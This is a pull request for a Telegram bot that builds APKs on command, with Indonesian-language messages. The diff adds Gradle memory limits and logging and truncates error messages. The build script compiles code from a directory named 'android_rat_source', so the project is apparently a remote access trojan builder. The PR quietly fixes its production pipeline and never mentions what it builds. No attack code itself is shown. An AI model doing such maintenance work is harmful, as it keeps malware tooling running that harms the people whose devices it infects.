### PR TITLE
Fix: Optimize Android build process to prevent memory issues

### DIFF
--- a/bot.js
+++ b/bot.js
@@ -479,7 +479,10 @@ bot.onText(/\/ambilapk/, (msg) => {
                 bot.sendMessage(chatId, '❌ Proses build dihentikan karena melebihi batas waktu 30 menit.');
                 return;
             }
-            const errorMessage = `❌ Gagal membuat APK.\n\nLog Error:\n\`\`\`\n${stderr || error.message}\n\`\`\``;
+            // Truncate the error message to avoid hitting Telegram's message length limit
+            const fullError = stderr || error.message;
+            const truncatedError = fullError.substring(0, 3500); // Batasi hingga 3500 karakter
+            const errorMessage = `❌ Gagal membuat APK.\n\nLog Error (mungkin terpotong):\n\`\`\`\n${truncatedError}\n\`\`\``;
             bot.sendMessage(chatId, errorMessage, { parse_mode: 'Markdown' });
             return;
         }

--- a/build_android.sh
+++ b/build_android.sh
@@ -76,8 +76,9 @@ fi
 # Navigate to the Android project directory
 cd android_rat_source
 
-echo ">>> Starting Gradle build..."
-"${GRADLE_HOME}/bin/gradle" clean assembleDebug --no-daemon
+echo ">>> Starting Gradle build with memory optimization..."
+# Added --info, --stacktrace for better logging, and JVM args to limit memory usage.
+"${GRADLE_HOME}/bin/gradle" clean assembleDebug --no-daemon --info --stacktrace -Dorg.gradle.jvmargs="-Xmx512m -XX:MaxMetaspaceSize=256m"
 
 echo ">>> Build finished successfully!"
 echo ">>> APK should be available at: app/build/outputs/apk/debug/app-debug.apk"


### PR DESCRIPTION
The Gradle build process was failing in the production environment, likely due to excessive memory consumption which caused the Gradle daemon to be killed.

This commit addresses the issue by:
1.  Modifying `build_android.sh` to apply memory limits to the Gradle JVM using the `-Dorg.gradle.jvmargs` flag. This prevents the build process from using too much memory.
2.  Adding `--info` and `--stacktrace` to the Gradle command for more detailed logging in case of future failures.
3.  Improving error handling in `bot.js` by truncating long error messages sent to Telegram. This prevents the "message is too long" API error and ensures build failure notifications are always delivered.